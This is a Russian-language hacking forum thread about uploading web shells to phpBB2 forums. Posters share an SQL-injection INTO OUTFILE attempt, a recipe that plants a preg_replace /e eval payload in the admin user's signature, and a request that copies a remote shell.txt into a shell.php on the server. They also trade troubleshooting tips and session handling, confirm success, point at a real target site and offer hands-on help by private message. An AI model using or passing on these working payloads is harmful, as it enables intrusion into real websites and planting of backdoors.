Форумы заливка shell - phpbb2

Посмотрел логи апача... логи молчат. никаких соденений не устанавливалось на отдачу файлика db.txt

 

А что делать если profile.php просто нету?

 

Схожая проблема, только чуть сложнее
2.0.21 чистый (без модов).
Админка есть
нулевой байт экранируется
мускуль-иньекция в скрипте ЦМС (не пхпбб)
чкрез восстановление БД - то же не получится, форум криво настроен, что нельзя сделать декап БД (оказалось что иногда криворукость помогает))))
Не пойму другого:
стараюсь делать через иньекцию INTO OUTFILE в */avatars/shel.php через CHAR или через 0x
Сервер мне только выдает строку в странице ту что после select но в файл не выводит
LOAD_FILE - вообще ни чего не выводит, но это я понял на всех хостингах, на моем тоже не выводит при чистом запросе из мускуль клиента.
Можно что то еще сделать по этим признакам?
спасибо
ЗЫ
Все работает!! Это я про експлоит Шанкара, рано разочаровался, то экранировало нул. байт в запросе SQL а через эксплойт все прошло! Вери гуд!

 

Не могу найти тему. Если кто помнит подскажите. Как сохранить возможность в phpbb заходить под любым логином. Там надо было добавить код при авторизации (был нужен доступ по ftp)

 

проще всего залить шелл:
создаем 1.sql cо следующим содержанием:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_REQUEST[c]));' WHERE user_id=2;

далее:
profile.php?mode=editprofile&c=copy('http://127.0.0.1/shell.txt','/home/home/public_html/forum/shell.php');

Всё готово

 

Спасибо, залился.
Всё перепробовал что только можно, а сделал как тут указано и всё ок.
П.С поэтому апнул тему...

 

Добавляю сигнатуру, захожу в профиль и вижу

код, есесно, не выполняется.


посмотрел соурсы движка

PHP:

 $signature = ($this_userdata['user_sig_bbcode_uid'] != '') ? preg_replace('#:' . $this_userdata['user_sig_bbcode_uid'] . '#si', '', $this_userdata['user_sig']) : $this_userdata['user_sig'];
 $signature = preg_replace($html_entities_match, $html_entities_replace, $signature);

Видно, что регулярка идет не через "/", а через "#"

заменил (.+)/e на (.+)#e - ошибка исчезла, но код не выполняется.

 

Обычно это прокатывало, на встретил форум, когда при заходе в профиль висит надпись,

код не выполняется ((
Случ, не знаете другой способ? (file_priv N, аву не заинклудить нету прав на заливку файлов и аватаров)

 

сессию в гете нужно держать. Сайт случаем, не http://b******oi.ru?

 

да)

ну тогда спортивный вопрос, как сессию держать в гете?

не хочешь не надо) но я его всё равно добью.

 

когда заходишь на профиль сессия в параметре GET передается

profile.php?u=2&c=md5_hash_of_session ее убирать не нужно

 

Помогу влить шелл через этот способ, стучи в ЛС.